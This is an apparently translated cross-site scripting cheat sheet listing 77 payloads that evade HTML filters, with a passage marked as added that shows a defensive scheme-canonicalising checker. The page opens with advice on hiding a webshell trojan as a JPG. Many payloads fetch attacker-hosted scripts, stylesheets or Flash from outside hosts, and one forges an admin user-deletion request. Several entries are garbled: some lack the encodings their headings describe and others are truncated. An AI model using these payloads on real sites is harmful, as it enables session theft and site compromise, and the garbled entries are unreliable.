Cross-site image shell
XSS cross-site code: <script>alert("")</script>

Add the code to the first line of the trojan (webshell), then change the trojan to the JPG image format; when the image-format trojan is accessed, our trojan is still executed.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolon or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multiline JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, as there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters inserted (1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">
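A defensive check, added here and not part of the original post, covering the scheme evasions in items (3) to (19) (mixed case, embedded tab/newline/carriage return, null bytes, leading spaces, numeric HTML entities with or without semicolons) and the ignorable extra characters listed in item (47): canonicalise a URL-valued attribute the way a browser effectively does before matching its scheme. The function names and the sample values are my own.

```javascript
// Added example (not from the original post): a defensive attribute check.
// Browsers tolerate the tricks listed above before they recognise a URL
// scheme, so a filter has to canonicalise the same way before matching:
// decode numeric character references (with or without a semicolon),
// drop the ignorable code points, then lower-case and compare the scheme.

const NUMERIC_ENTITY = /&#(x[0-9a-f]+|[0-9]+);?/gi;

// Code points browsers skip inside a scheme: C0 controls (incl. tab, LF, CR,
// NUL), space, DEL, NBSP, U+2000-U+200F, ideographic space and the BOM.
const IGNORABLE = /[\u0000-\u0020\u007f\u00a0\u2000-\u200f\u3000\ufeff]/g;

function decodeNumericEntities(value) {
  return value.replace(NUMERIC_ENTITY, (match, code) => {
    const cp = code[0].toLowerCase() === 'x'
      ? parseInt(code.slice(1), 16)
      : parseInt(code, 10);
    // Leave anything outside the Unicode range untouched rather than throw.
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
  });
}

// Returns the canonical scheme ("javascript", "http", ...) or null when the
// value has no scheme at all (relative URLs such as "/img/a.png").
function canonicalScheme(rawValue) {
  const cleaned = decodeNumericEntities(String(rawValue))
    .replace(IGNORABLE, '')
    .toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(cleaned);
  return m ? m[1] : null;
}

const SCRIPT_SCHEMES = new Set(['javascript', 'vbscript']);

// True when the attribute value would run script once a browser parses it.
function isScriptUrl(rawValue) {
  const scheme = canonicalScheme(rawValue);
  return scheme !== null && SCRIPT_SCHEMES.has(scheme);
}

// Constructed sample values mirroring the vectors on this page.
const samples = [
  "JaVaScRiPt:alert('XSS')",        // mixed case
  "jav\tascript:alert('XSS')",      // embedded tab
  "java\u0000script:alert('XSS')",  // NUL byte
  "j&#97;v&#x61;script:alert(1)",   // numeric entities
  "http://example.invalid/a.jpg",   // benign
];
for (const s of samples) console.log(JSON.stringify(s), '->', isScriptUrl(s));
```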
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash lets you smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Decimal IP
<A HREF="http://3232235521">XSS</A>

(71) Hexadecimal IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot (absolute DNS)
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>